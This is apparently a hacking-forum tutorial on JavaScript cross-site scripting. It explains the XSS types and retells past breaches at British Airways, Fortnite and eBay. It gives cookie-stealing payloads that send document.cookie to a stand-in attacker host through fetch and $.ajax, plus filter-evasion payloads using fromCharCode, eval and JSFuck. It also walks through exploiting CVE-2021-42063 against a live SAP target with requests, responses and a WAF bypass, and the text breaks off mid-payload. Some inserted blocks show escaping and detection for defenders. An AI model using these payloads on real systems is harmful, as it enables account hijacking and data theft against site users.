XSS in all its glory [ Part 2 ] [ JavaScript ]


XSS[is] JavaScript Damage


This article delves into JavaScript-based XSS, distinguishing it from HTML/CSS injection, and recaps the first part of this series, which focused on HTML/CSS injection. We will see the full power of XSS and refer to cases that happened in the past. It is not an "alert(1)" article.

Content

1. JavaScript Based XSS
2. Understanding JavaScript in Web Applications
3. XSS types
4. JavaScript Functionalities Exploited in XSS Attacks
5. Some XSS Cases
6. Rukopashnaya (Рукопашная)

JavaScript Based XSS

JavaScript-based XSS is a security exploit where an attacker injects malicious JavaScript code into a web page viewed by other users. Unlike HTML/CSS injection, which alters the structure or style of a webpage, JavaScript XSS targets the functionality, exploiting the dynamic nature of JavaScript.

Key Differences from HTML/CSS Injection

Scope of Impact: JavaScript can manipulate browser APIs and user session data.
Interactivity: JavaScript XSS can create interactive malicious scripts.
Data Access: JavaScript-based XSS can access sensitive information like cookies and tokens.

The first part of our series explored HTML and CSS injection vulnerabilities. HTML injection affects the page's structure, while CSS injection manipulates visual presentation. These attacks can disrupt a website's layout but generally don't execute malicious scripts or access user data.

Understanding JavaScript in Web Applications

JavaScript is pivotal in modern web development, driving interactive and dynamic aspects of web applications. However, its features also open avenues for vulnerabilities like XSS.

Asynchronous Operations with AJAX

AJAX (Asynchronous JavaScript and XML) allows web applications to send and retrieve data from a server asynchronously, without interfering with the display and behavior of the existing page. This means web applications can update content dynamically, leading to a smoother user experience.

Front-End Frameworks and Libraries

Frameworks like React, Angular, and Vue.js are JavaScript-based. They offer reusable components and reactive data binding, enabling the development of complex, single-page applications. Basically, they are widely used.

Server-Side JavaScript

With the advent of Node.js, JavaScript can be used not only on the client side but also on the server side. This has allowed developers to use a single programming language across the entire web development stack.

XSS types

Reflected XSS

Reflected XSS attacks occur when an attacker sends a malicious script to a user, often through a link. The script is then executed by the user's browser as part of the victim's interaction with the website.

Request sent by the user:
Code:
http://xacker.mamkin/search?query=<script>alert('XSS')</script>
Server-side code (Node.js http-style handler):
Code:
// Vulnerable: the query parameter is concatenated into the HTML response without escaping
var searchQuery = new URL(request.url, "http://localhost").searchParams.get("query");
response.write("<div>Results for " + searchQuery + "</div>");
In this example, the script alert('XSS') is injected into the query parameter and executed when the search results are displayed. The server includes the script in the response without proper sanitization, leading to the execution of the script on the client side.

Stored XSS

Stored XSS attacks occur when an attacker stores a malicious script in a website's database, which is then rendered and executed when other users access the affected page.
Let's say that the attacker sends a request which is stored in the DB; when a user opens the website, the code gets executed.

Code that gets executed on the client side:
Code:
<script>fetch('http://xacker.mamkin/?cookie=' + document.cookie)</script>
How it is rendered on the client side:
Code:
<div>
 User Comments:
 <p><script>fetch('http://xacker.mamkin/?cookie=' + document.cookie)</script></p>
</div>
Here, the attacker's script is stored in the database through a comment form and later rendered on a web page. When other users visit the page, their cookies are sent to the attacker's server.

DOM-based XSS

DOM-based XSS attacks manipulate the Document Object Model (DOM) of the webpage, often by altering the URL and having JavaScript execute malicious code based on this manipulation.

Request sent by the user:
Code:
http://xacker.mamkin/#<script>alert('XSS')</script>
Client-side JavaScript code:
Code:
// Vulnerable: the URL fragment is written into the page as HTML without sanitization
var fragment = window.location.hash.slice(1);
document.getElementById('content').innerHTML = fragment;
In this example, the JavaScript code takes a fragment of the URL (after the #) and injects it directly into the webpage without sanitization. The script within the URL is executed as a result.
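The reflected and DOM-based sinks above handled safely, as an added example that is not part of the original post: an escaping helper for the "Results for" output, and textContent instead of innerHTML for the fragment. It runs in plain Node.js; the element is a constructed stand-in for a DOM node, and all function names are this example's own.

```javascript
// Added example (not from the original post). Shows the reflected and
// DOM-based sinks from the post with its payload, first as written and then
// hardened. Node.js only; the "element" is a constructed stand-in for a DOM node.

// Escape the characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Reflected XSS, as in the post: the query lands in the HTML unescaped.
function renderResultsVulnerable(query) {
  return "<div>Results for " + query + "</div>";
}

// Hardened: escape at the point where data meets markup, so <script> arrives
// in the browser as literal text rather than as an element.
function renderResultsSafe(query) {
  return "<div>Results for " + escapeHtml(query) + "</div>";
}

// Minimal stand-in for a DOM element (constructed for this example). It mirrors
// the browser rule that matters here: innerHTML parses its input as markup,
// textContent treats it as text and serialises it back with & < > escaped.
function makeElementStub() {
  let markup = "";
  return {
    set innerHTML(v) { markup = String(v); },
    get innerHTML() { return markup; },
    set textContent(v) {
      markup = String(v).replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
    },
  };
}

// DOM-based XSS, as in the post: location.hash goes straight into innerHTML.
function renderFragmentVulnerable(element, hash) {
  element.innerHTML = hash.slice(1);
  return element.innerHTML;
}

// Hardened: the fragment is data, so it is assigned as text, never as markup.
function renderFragmentSafe(element, hash) {
  element.textContent = hash.slice(1);
  return element.innerHTML; // what the browser would now hold for that node
}

// Constructed sample input: the payload used in the post.
const PAYLOAD = "<script>alert('XSS')</script>";

// Does the produced markup still contain the payload as live markup?
function containsLivePayload(markup) {
  return markup.includes(PAYLOAD);
}
```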

JavaScript Functionalities Exploited in XSS Attacks

While JavaScript enriches web applications, it also introduces potential security risks. XSS attacks often exploit certain aspects of JavaScript to execute malicious code in a user’s browser.

Manipulating the DOM

The Document Object Model (DOM) is an API for HTML and XML documents that provides a structured representation of the document and defines how documents can be accessed and manipulated. In XSS attacks, malicious scripts often manipulate the DOM to insert or modify web page content.

For example, let's say that we have a website like this:
Code:
<!DOCTYPE html>
<html>
<head>
    <title>Sample Page</title>
</head>
<body>
    <div id="someElement">Initial Content</div>
</body>
</html>
In the code above, the content is static, so the user won't be able to change it. But usually in XSS cases the content is taken as input from the user, so it is dynamic. Let's say that we send a request xss.is/?input={XSScodeHere} and the page's script does this:
Code:
// The user-controlled input is written into the element as HTML
document.getElementById('someElement').innerHTML = 'XSScodeHere';
In that case, if the web service takes input from the user, the JavaScript code dynamically changes the content of a webpage element, which is how XSS attacks inject harmful content. The rendered DOM becomes:
Code:
<!DOCTYPE html>
<html>
<head>
    <title>Sample Page</title>
</head>
<body>
    <div id="someElement">XSScodeHere</div>
</body>
</html>
In easier language:
When we input something, the source code (CTRL+U) won't change, but the "inspect" view in the browser's developer tools will show the edited code. That's the reason why I want to add Chromium support to my tools, but I am still thinking about it as it will also use a lot of power.

P.S. Obviously we have to replace "XSScodeHere" with something malicious; I will give some examples below.

Event Handlers

JavaScript can assign functions to be executed when specific events occur, such as mouse clicks or keyboard inputs. Attackers can embed malicious code in these event handlers.

In this case, maliciousFunction could be code that performs unauthorized actions, such as stealing cookies or redirecting the user to a malicious website:
Code:
<button onclick="maliciousFunction()">Click Me</button>
Another very simple example:
Code:
<button onclick="alert(1)">Click Me</button>

AJAX Calls

AJAX can be exploited to send data to or retrieve data from a malicious server without the user’s knowledge.

This script sends the user's cookies to a malicious server (jQuery is assumed to be loaded on the page):
Code:
// Posts the victim's cookies to the attacker-controlled host in the background
$.ajax({
 url: 'http://xacker.mamkin/steal-data',
 type: 'POST',
 data: { sensitiveData: document.cookie }
});

Some XSS Cases

We all know that SQL injection attacks pose a greater threat to data extraction; basically, they have higher severity than XSS in most cases. That's because XSS usually needs user interaction. What I am trying to say is that XSS is underrated for WhiteHats and overrated for BlackHats xD. Bug bounty programs won't pay much for XSS as it requires user interaction, while it can be profitable in the "dark" business. Let's check some cases from the past:

British Airways (2018): British Airways experienced a significant data breach due to an XSS attack executed by Magecart, a well-known hacker group. The group exploited a vulnerability in a JavaScript library called Feedify, which was used on the British Airways website. They modified the script to send customer data to a malicious server, mimicking British Airways' domain, thereby successfully performing credit card skimming on 380,000 booking transactions. The attackers were sophisticated enough to use an SSL certificate for their fake server, making it appear secure to users and browsers.

From WhiteHat’s perspective:
Well, it led to a $230 million fine (https://www.reflectiz.com/blog/brit...arty-breach-leads-to-a-230-million-gdpr-fine/). If the vulnerability had been reported, the reply probably would have been either "The problem is in a third party and doesn't concern us", or, if a WhiteHat reported it as "Use of Unmaintained Third Party Components (CWE-1104)", it would have been considered Low or Medium, because exploiting it would be considered illegal and the impact probably wouldn't be much as it wasn't exploited. The bounty value would have been in the range of $5-10k; these numbers are not "fake", they are the real deal (https://www.hackerone.com/application-security/reducing-risk-bug-bounty-program).

The conclusion here is that Bug Bounty platforms are great for companies to participate, to avoid this kind of behavior. When it comes to my own thoughts about this, WhiteHats do what they do mostly for their reputation and bounty is like a tip for them.

From BlackHat’s perspective:
I am not a BlackHat, so correct me if I am wrong. I think that the BlackHat had to extract the data, otherwise showing the impact would be impossible, and that is what they did, so nice move. The question is what happened to that data? I couldn't find any information on the internet; obviously we know that it was sold, the main question is "To whom?"

Fortnite (2019): The popular online video game Fortnite faced a potential XSS attack, which could have led to a significant data breach. An unsecured, retired web page on the game's site contained a dangerous XSS vulnerability, giving attackers potential access to 200 million users. The attack could have allowed the theft of the game's virtual currency and the recording of player conversations, providing valuable information for future attacks. Security researchers from Check Point discovered and reported this vulnerability to Fortnite.

There is a video PoC. As you can see from the video, it requires user interaction, so a WhiteHat's bounty here would probably be the same as it would have been with British Airways, and a BlackHat's damage would be a little less than what was done to British Airways. I guess in the future we will refer to these cases to understand how badly an XSS attack was exploited xD

eBay (2015-2016): eBay experienced a severe XSS vulnerability where the website used a "url" parameter for redirection without validating its value. This oversight allowed attackers to inject malicious code into the platform, potentially gaining full access to eBay seller accounts, manipulating product listings, and stealing payment details. This vulnerability was actively exploited by attackers to manipulate high-value product listings, such as vehicles.

The vulnerability in British Airways was actually stored, even though related to third-party components; the vulnerability in EpicGames was in its own domain, and it was a CORS issue. If I understood the news correctly, the eBay URL parameter was used to inject an iframe to a malicious website, so it is more of a CSP issue there. There is no proper source for me to give the exact information, but I am pretty sure that it is probably at the same level as the vulnerability in Fortnite, or maybe slightly higher, because it is in the main domain. But in these cases that matters for WhiteHats rather than for BlackHats, because BlackHats will probably use a short link: reflected XSS for stealing data will use a "suspicious" payload, it will be long, so in the Fortnite and eBay cases they should be the same in the eyes of a BlackHat (I think). For a WhiteHat, eBay is more severe as it is in the main domain; we don't care how big the payload can get, there is no "length of payload" in the CVSS score xD

Now I have got an idea, we should create our own score and add “Length of Payload”, because it matters. I will call it XSS, eXploitation Severity Score.

Bypassing Input Sanitization

Attackers constantly develop sophisticated techniques to bypass client-side sanitization and security measures. Obviously there are a lot of methods for that, and the ones I explain here are just part of what is in the wild. We can see people posting daily on X (Twitter) with Cloudflare/Akamai bypasses; even though copy-pasting them can work sometimes, bypasses are done through manual tests, by understanding what gets blocked/sanitized.

Using Advanced Encoding

Browsers can interpret various encodings, and attackers often use this feature to "hide" payloads.
Code:
<script>alert('XSS');</script>
This basic XSS injection might be blocked by sanitization filters. However, encoding the payload, for instance as character codes, hexadecimal or base64, could bypass the filters:
Code:
<script>alert(String.fromCharCode(88,83,83));</script>
You can see a lot of payloads like this. The point here is not to "hide" the "XSS", but to hide the "alert" itself; as far as I know, HTML/URL encoding is also used. I haven't used any encoding for XSS bypass.

Obfuscating Scripts

Obfuscation involves disguising the malicious script to evade detection.
Code:
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">
The onerror event triggers an eval() call, which executes the decoded script, displaying an alert with 'XSS'.
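Normalising the two payloads above before matching, as an added example that is not part of the original post: it resolves String.fromCharCode(...) calls and unwraps eval("...") so that a detection rule sees the JavaScript the browser would run. The helper names and the simple rule are this example's own; the inputs are the post's payloads.

```javascript
// Added example (not from the original post). A log/WAF normaliser that
// resolves String.fromCharCode(...) and unwraps eval("...") so a rule can be
// matched against the decoded script. Names and the rule are assumptions.

// String.fromCharCode( 97, 108, ... ) with optional whitespace, any case.
const FROM_CHAR_CODE = /String\.fromCharCode\s*\(\s*([0-9\s,]*)\)/gi;

// Replace each String.fromCharCode(...) with the string it builds, written as a
// double-quoted literal so the rest of the expression still reads as JS.
function resolveFromCharCode(payload) {
  return payload.replace(FROM_CHAR_CODE, (match, list) => {
    const codes = list.split(",").map((s) => s.trim()).filter(Boolean).map(Number);
    // fromCharCode takes UTF-16 code units; anything else is left untouched
    if (codes.length === 0 || codes.some((c) => !Number.isInteger(c) || c < 0 || c > 0xffff)) {
      return match;
    }
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// eval("...") with a plain double-quoted literal becomes the literal's content.
// Literals that are not valid JSON strings are left as they are.
function unwrapEval(payload) {
  return payload.replace(/\beval\s*\(\s*("(?:[^"\\]|\\.)*")\s*\)/g, (match, lit) => {
    try {
      return JSON.parse(lit);
    } catch (e) {
      return match;
    }
  });
}

function normalise(payload) {
  return unwrapEval(resolveFromCharCode(payload));
}

// A deliberately simple rule: does the script call alert(...) or read cookies?
const RULE = /\balert\s*\(|document\.cookie/;

// Report whether the rule matches the raw payload and the normalised one.
function inspect(payload) {
  const normalised = normalise(payload);
  return { normalised, rawHit: RULE.test(payload), normalisedHit: RULE.test(normalised) };
}
```

The second payload never contains the word "alert" on the wire, so a rule that runs before normalisation misses it while the same rule after normalisation matches.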

An obfuscation method that almost always works for me is JSFuck (https://jsfuck.com):
Code:
<script>
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]
+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])
</script>

It translates as:
Code:
<script>alert(1)</script>

Utilizing HTML5 Attributes

HTML5 introduced several new attributes which could be used to exploit XSS.
Code:
<audio src="malicious.mp3" onerror="alert('XSS')"></audio>
I have explained it in the previous article: https://xss.is/threads/103323/.

Rukopashnaya (Рукопашная)

Everything written above is just the basics; real cases are different. I will explain hunting in the wild the way I do it. It can be done in 2 ways: automated (or as I call it, AK-47), or manual (rukopashnaya). I have explained automation with kXSS and Bablo, so I will talk about other stuff. We all play with Nuclei sometimes, and they have a template for CVE-2021-42063. Let's check what is in there. I have a vulnerable target and I will analyze it in a black-box way. It may be the strangest analysis of an exploit.

The template:
Code:
id: CVE-2021-42063

info:
  name: SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: |
    SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.
  remediation: |
    Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2022/Mar/32
    - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
    - https://twitter.com/MrTuxracer/status/1505934549217382409
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42063
    - http://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-42063
    cwe-id: CWE-79
    epss-score: 0.00491
    epss-percentile: 0.73418
    cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: knowledge_warehouse
    shodan-query: http.favicon.hash:-266008933
    zoomeye-query: +app:"SAP NetWeaver Application Server httpd
  tags: cve2021,sap,xss,seclists,packetstorm,cve

http:
  - method: GET
    path:
      - "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>"
          - "SAPIKS2"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
What can we analyze from it? We can see that the payload is <SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>. I have the following questions in mind:
1. Why is it HTML encoded?
2. Why is it uppercase?
3. Why does it end with .asp, and what if I remove it?

Let's check it with my vulnerable target. My request:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/PirivetPirivet.asp HTTP/2
Response:
Code:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/PIRIVETPIRIVET">
</head>
<body>
</body>
</html>
This shows that no matter what I input, the output will be in uppercase. JavaScript is case sensitive, which means that payloads in uppercase won't work, so let's aim for HTML injection first. But before that I will remove the .asp.
Request:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/PirivetPirivet HTTP/2
Response:
Code:
HTTP/2 404 Not Found
Okay, so it must end with .asp. Time for HTML injection:
Request:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><h1>test</h1>.asp HTTP/2
Response:

Image [1]

As we can see from the screenshot, HTML injection works and we were able to escape the meta tag. Now we have multiple ways to exploit this vulnerability. I will use a slightly different approach, but before I start with it, let's check JSFuck. I am starting with JSFuck because other simple/basic payloads won't work as they will get uppercased.
Request:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><script>[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+
!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])</script>.asp HTTP/2
Response:
Code:
HTTP/2 403 Forbidden
I think the problem is with the "script" tag, so let's change it to an "img" tag.
Request:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]
